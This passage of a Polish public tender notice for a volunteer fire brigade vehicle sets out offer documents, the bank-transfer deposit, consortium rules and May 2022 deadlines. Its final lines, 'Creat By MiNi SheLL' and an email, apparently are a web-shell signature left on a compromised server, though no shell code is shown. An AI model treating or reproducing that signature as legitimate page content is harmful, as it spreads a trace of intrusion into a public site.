r.<br/>nr 143, poz. 1002 z poźn. zm.) na oferowany samochód,<br/>3. świadectwo homologacji typu oferowanego samochodu - potwierdzający parametry podwozia oferowanego samochodu. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. WYKONAWCA ZOBOWIĄZANY JEST ZŁOŻYĆ ZAMAWIAJĄCEMU OFERTĘ ZAWIERAJĄCĄ:<br/>1.1. Formularz Ofertowy - Załącznik Nr 1 do SWZ,<br/>1.2. Karta Oferowanego Samochodu - zgodnie ze wzorem – Załącznik nr 1A do SWZ:<br/>1.3. Ważne świadectwo dopuszczenia do użytkowania CNBOP wydane w oparciu o rozporządzenie Ministra Spraw<br/>Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących do zapewnienia<br/>bezpieczeństwa publicznego lub ochronie zdrowia i życia lub mienia, a także wydania dopuszczenia tych wyrobów do<br/>użytkowania (Dz. U. z dnia 2007 r. Nr 143, poz.1002 z poźn. zm.) na oferowany samochód,<br/>1.4. Świadectwo homologacji typu oferowanego samochodu - potwierdzający parametry oferowanego podwozia<br/>samochodu,<br/>1.5. OŚWIADCZENIE Wykonawcy, o którym mowa w Rozdziale IX pkt. 1 – Załącznik Nr 2 do SWZ,<br/>1.6. (jeżeli dotyczy) OŚWIADCZENIE podmiotu udostępniającego zasoby o którym mowa w Rozdziale VIII pkt. 4.8 – Załącznik 2a do SWZ,<br/>1.7. (jeżeli dotyczy) oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienie, składane na podstawie<br/>art. 117 ust 4 p.z.p., o którym mowa w Rozdziale VIII pkt. 5.8. - Załącznik nr 8 do SWZ,<br/>1.8. (jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby lub inne dokumenty<br/>-zgodnie z Rozdziałem VIII ust. 4.5. - Załącznik nr 7 do SWZ,<br/>1.9. Potwierdzenie umocowania osoby podpisującej Ofertę do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby.<br/>1.10. (jeżeli dotyczy) Pełnomocnictwo dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.<br/>2. Dokumenty podmiotów zagranicznych (Rozdział IX SWZ):<br/>2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast informacji<br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej składa informację z odpowiedniego rejestru zawierającego<br/>informacje o jego beneficjentach rzeczywistych albo, w przypadku braku takiego rejestru, inny równoważny dokument<br/>wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, określający jego beneficjentów rzeczywistych.<br/>2.2. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których<br/>mowa w pkt 3.1., lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1,<br/>2 i 4 p.z.p., zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie<br/>Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy. Dokument ten powinien być również wystawiony nie wcześniej niż 3 miesiące przed jego<br/>złożeniem.<br/>3. W przypadku, gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu powołuje się na zasoby<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 p.z.p., Zamawiający żąda od Wykonawcy<br/>przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 2.2. dotyczących tych podmiotów,<br/>potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. (Rozdział IX SWZ)<br/>1.8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty podmiotowy środek dowodowy<br/>stanowiący oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy (zgodnie z art. 117 ust. 4.) –<br/>Załącznik Nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> (ROZDZIAŁ XIV SWZ)<br/>1. Wykonawca wnosi wadium przed upływem terminu składania ofert w wysokości 3000,00 zł (słownie: trzy tysiące złotych).<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>2.1. pieniądzu;<br/>2.2. gwarancjach bankowych;<br/>2.3. gwarancjach ubezpieczeniowych;<br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3. Wadium wniesione w pieniądzu należy złożyć przelewem bankowym na konto Zamawiającego :<br/>Bank Spółdzielczy w Poddębicach Oddział w Uniejowie:<br/>76-9263-0000-2009-3406-2002-0001<br/>w tytule wpisując: „OSP.02.2022 – wadium”.<br/>Za termin wniesienia wadium w formie pieniężnej uznaje się datę uznania środków na koncie Zamawiającego (dzień, godzina).<br/>4. W przypadku złożenia wadium w innej formie niż pieniężna, Wykonawca przekazuje Zamawiającemu oryginał gwarancji<br/>lub poręczenia, w postaci elektronicznej.<br/>5. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>5.1. upływu terminu związania ofertą;<br/>5.2. zawarcia umowy w sprawie zamówienia publicznego;<br/>5.3. unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>6. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy:<br/>6.1. który wycofał ofertę przed upływem terminu składania ofert;<br/>6.2. którego oferta została odrzucona;<br/>6.3. po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>6.4. po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7. Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 6, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w rozdziale XXIII SWZ.<br/>8. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>9. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>10. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w okolicznościach wskazanych w art. 98 ust 6 p.z.p.. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wspólne ubieganie się o udzielenie zamówienia (np. konsorcja, spółki cywilne).<br/>1.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1.2. W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego.<br/>1.3. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>1.4. Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania o zamówienie<br/>publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego<br/>pełnomocnika oraz zakres jego umocowania. Podpisy muszą zostać złożone przez osoby uprawnione do składania<br/>oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej.<br/>1.5. Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako pełnomocnik.<br/>1.6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1.6.1. żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach,<br/>o których mowa w Rozdziale VII.<br/>1.6.2. warunki udziału w postępowaniu określone w Rozdziale VIII winien spełniać co najmniej jeden z tych Wykonawców<br/>albo wszyscy ci Wykonawcy występujący wspólnie.<br/>1.7. Celem wykazania braku podstaw do wykluczenia, o których mowa w Rozdziale VII oraz spełnienia warunków udziału w<br/>postępowaniu o których mowa w Rozdziale VIII Wykonawcy składają oświadczania i dokumenty określone w rozdziale IX, w<br/>sposób i w trybie tam określonym.<br/>1.8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty podmiotowy środek dowodowy<br/>stanowiący oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy (zgodnie z art. 117 ust. 4.) –<br/>Załącznik Nr 8 do SWZ.<br/>1.9. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców przed<br/>przystąpieniem do podpisania umowy o zamówienie publiczne. Termin, na jaki winna być zawarta umowa Wykonawców<br/>występujących wspólnie, nie może być krótszy od terminu określonego na wykonanie zamówienia.<br/>1.10. Umowa regulująca współpracę Wykonawców składających wspólnie ofertę nie może być umową przedwstępną ani<br/>umową zawartą pod warunkiem zawieszającym i powinna określać w szczególności:<br/>1.10.1. podmioty składające ofertę i podpisujące umowę;<br/>1.10.2. cel gospodarczy, dla którego została zawarta umowa;<br/>1.10.3. zasady reprezentacji i prowadzenia spraw, w tym wskazania podmiotu odpowiedzialnego za prowadzenie rozliczeń z<br/>Zamawiającym (wystawienia faktur);<br/>1.10.4. oznaczenie czasu trwania umowy (wymaga się, aby czas trwania umowy był nie krótszy niż okres realizacji<br/>zamówienia oraz okres gwarancji jakości i/lub rękojmi);<br/>1.10.5. zakres i wartość dostaw realizowanych przez poszczególnych członków konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy, które zostaną wprowadzone do treści zawieranej umowy zostały zawarte we wzorze<br/>umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>2. Wzór umowy szczegółowo przewiduje i określa warunki zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Adres skrzynki ePUAP, na który Wykonawcy składają oferty:<br/>/1011052/SkrytkaESP<br/>(udostępniona Zamawiającemu przez Urząd Gminy w Wartkowicach)

Creat By MiNi SheLL
Email: jattceo@gmail.com